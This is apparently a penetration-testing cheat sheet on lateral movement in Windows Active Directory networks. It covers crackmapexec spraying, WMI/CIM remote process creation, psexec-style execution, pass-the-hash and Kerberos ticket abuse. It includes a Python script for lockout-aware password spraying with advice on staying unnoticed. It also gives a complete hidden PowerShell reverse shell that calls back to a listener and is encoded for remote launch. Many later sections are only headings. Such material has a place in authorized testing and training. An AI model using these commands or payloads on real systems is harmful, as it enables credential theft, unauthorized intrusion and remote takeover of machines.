Lateral Movement

https://wadcoms.github.io/#

Spraying with crackmapexec

Usernames and passwords:

crackmapexec smb <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>
crackmapexec winrm <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>
crackmapexec rdp <IP/SUBNET> -u users.txt -p passwords.txt --continue-on-success --rdp-timeout 30

Hashes (NT hash, or LM:NT; crackmapexec takes -H for the hash, not impacket's -hashes):

crackmapexec smb <IP/SUBNET> -u users.txt -H <HASH> -d <domain>
crackmapexec winrm <IP/SUBNET> -u users.txt -H <HASH> -d <domain>
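Spraying a multi-entry password file with the commands above tries every user against every password, which locks accounts out if the domain has a lockout threshold. The following Python is an added example, not part of this page and not crackmapexec's own code: it splits a password list into batches that stay under a lockout threshold (the policy values are constructed; read the real ones with crackmapexec's --pass-pol first), renders one crackmapexec run per batch with a sleep for the observation window in between, and parses crackmapexec-style result lines (the sample output is constructed) to pull out valid logins and which of them are local admin, the (Pwn3d!) marker.

```python
"""Lockout-aware password spraying around crackmapexec.

Added example: not part of the original page and not crackmapexec's code.
Lockout threshold / window, user and password lists and the sample output
are constructed; read the real policy with `crackmapexec smb <DC> --pass-pol`.
"""
import re
import shlex

# One crackmapexec result line:
# "<proto> <ip> <port> <host> [+] <domain>\<user>:<secret> (Pwn3d!)"
CME_HIT = re.compile(
    r"^\s*(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[\+\]\s+(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<secret>\S+)"
    r"(?P<admin>\s+\(Pwn3d!\))?"
)


def spray_batches(passwords, lockout_threshold, safety_margin=2):
    """Split passwords into batches that fit under the lockout threshold.

    Every password in a batch is tried against every user inside one
    observation window, so a batch holds at most threshold - margin
    passwords. A threshold of 0 means no lockout policy (single batch)."""
    passwords = list(passwords)
    if lockout_threshold == 0:
        return [passwords]
    per_window = max(1, lockout_threshold - safety_margin)
    return [passwords[i:i + per_window] for i in range(0, len(passwords), per_window)]


def cme_commands(target, domain, users_file, batches, window_minutes):
    """Render shell lines: one crackmapexec run per batch, sleeping for the
    observation window between batches so badPwdCount resets first."""
    lines = []
    for n, batch in enumerate(batches):
        batch_file = f"batch{n}.txt"
        quoted = " ".join(shlex.quote(p) for p in batch)
        lines.append(f"printf '%s\\n' {quoted} > {batch_file}")
        lines.append(
            f"crackmapexec smb {target} -u {users_file} -p {batch_file} "
            f"-d {domain} --continue-on-success"
        )
        if n < len(batches) - 1:
            lines.append(f"sleep {window_minutes * 60}")
    return lines


def parse_hits(output):
    """Return (user, secret, is_admin) for every [+] line in CME output."""
    hits = []
    for line in output.splitlines():
        m = CME_HIT.match(line)
        if m:
            hits.append((m["user"], m["secret"], m["admin"] is not None))
    return hits


# Constructed sample of crackmapexec output for parse_hits().
SAMPLE_OUTPUT = r"""
SMB         10.0.0.5        445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    DC01             [-] corp.local\asmith:Winter2024! STATUS_LOGON_FAILURE
SMB         10.0.0.5        445    DC01             [+] corp.local\jdoe:Winter2024!
SMB         10.0.0.5        445    DC01             [+] corp.local\svc_backup:Winter2024! (Pwn3d!)
"""

if __name__ == "__main__":
    # Constructed policy: 5 bad attempts lock the account, 30 minute window.
    batches = spray_batches(["Winter2024!", "Spring2024!", "Summer2024!", "Company123"], 5)
    print("\n".join(cme_commands("10.0.0.0/24", "corp.local", "users.txt", batches, 30)))
    print(parse_hits(SAMPLE_OUTPUT))
```

The margin of two attempts is deliberate: a user who mistypes their own password during the window shares the counter with you, and a locked-out service account is the fastest way to get noticed.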

WMI (PORT 135 + dynamic RPC) / WinRM (PORT 5985 / 5986)

WMI

With WMI we can create a process on the target machine through Win32_Process.Create.

ReturnValue = 0 means the process was created (the new ProcessId is returned as well). WMI does not return the command's output, so the command should phone home or write its result somewhere you can read. wmic is deprecated in recent Windows releases; the PowerShell CIM cmdlets below do the same job.

wmic /node:<IP> /user:<USER> /password:<PASSWORD> process call create "calc"
PowerShell exploitation

Store the credentials in PSCredential object:

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Create a CIM session to the target over DCOM (WMI's native transport, TCP 135):

$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $options
$command = 'calc';

Invoke the Win32_Process.Create method through the session (ReturnValue 0 means success):

Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $command};

You can run a reverse shell instead of calc by putting the encoded command into $command.

Generate the base64-encoded payload with Python on the Kali machine. powershell -e expects the script encoded as UTF-16LE (no BOM) and then base64, which is why a plain base64 of the UTF-8 text does not work:

import base64

# Plain PowerShell TCP reverse shell; replace <IP> and <PORT> with the listener.
payload = '$client = New-Object System.Net.Sockets.TCPClient("<IP>",<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# UTF-16LE without BOM, then base64: the exact format `powershell -e` decodes.
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16le')).decode()

print(cmd)

WinRM

winrs is the built-in Windows client for WinRM; from Linux, evil-winrm is the usual choice.

evil-winrm needs a username plus either the password or the NT hash, and the user must be allowed to use WinRM on the target (local Administrators or the Remote Management Users group).

PsExec /wmiexec / smbexec (PORT 445)

The user needs local administrator rights on the target and the ADMIN$ share must be reachable over SMB.

psexec.py and smbexec.py work with either a password or an NTLM hash. psexec.py uploads a service binary, so it needs a share it can write to (ADMIN$ by default, any writable share will do); smbexec.py only creates a service that runs cmd.exe, so nothing is uploaded. wmiexec.py runs the command over WMI (TCP 135 + dynamic RPC) and reads the output back over SMB (445).

Credentials

Hash

Pass the Hash

The target must accept NTLM authentication over SMB (TCP 445).

Pass the Hash works against NTLM authentication in general, NTLMv1 and NTLMv2 alike: both challenge responses are computed from the NT hash, so the hash stands in for the password. It does not work against services that only accept Kerberos (use overpass the hash there) or where NTLM is disabled.

If we crack a password and/or can dump the SAM hashes, we can leverage both for lateral movement in the network.

Pass the password

You can pass the credentials to netexec and scan the network:

Pass the hash

You can pass the NTLM hash to netexec and scan the network in the same way as above:

More info

Use CME to dump valuable data:

Dump the LSA:

Check built in modules:

Dump the LSASS credentials (returns NTLM hash):

Netexec database:

Access the share:

Code execution

Overpass the hash

The TGT obtained this way lives in the logon session (or ccache) it was requested into; it is not bound to a host, so it can also be exported and used from another machine (see Pass the ticket).

Abuse a user's NT hash (or AES key) to obtain a full Kerberos TGT: with RC4-HMAC (etype 23) the Kerberos key is the NT hash itself, so the hash is enough to encrypt the AS-REQ pre-authentication timestamp.

Generate kerberos ticket:

List Kerberos tickets:

Reuse the TGT:

Pass the ticket

No administrative privileges are required to inject a ticket into your own logon session; extracting other users' tickets from LSASS memory with mimikatz does need local admin.

Takes advantage of Kerberos tickets (TGTs and service tickets, TGS) that can be re-injected elsewhere on the network: we take someone else's ticket and use it for our own session, within the ticket's lifetime.

Export all tickets from the memory using mimikatz:

Verify tickets existence:

Use the exported ticket:

DCOM

Local Administrator access on the target and TCP 135 (plus the dynamic RPC port DCOM negotiates) are required.

Create DCOM instance:

Execute shell command:

Execute reverse shell encoded in base64:
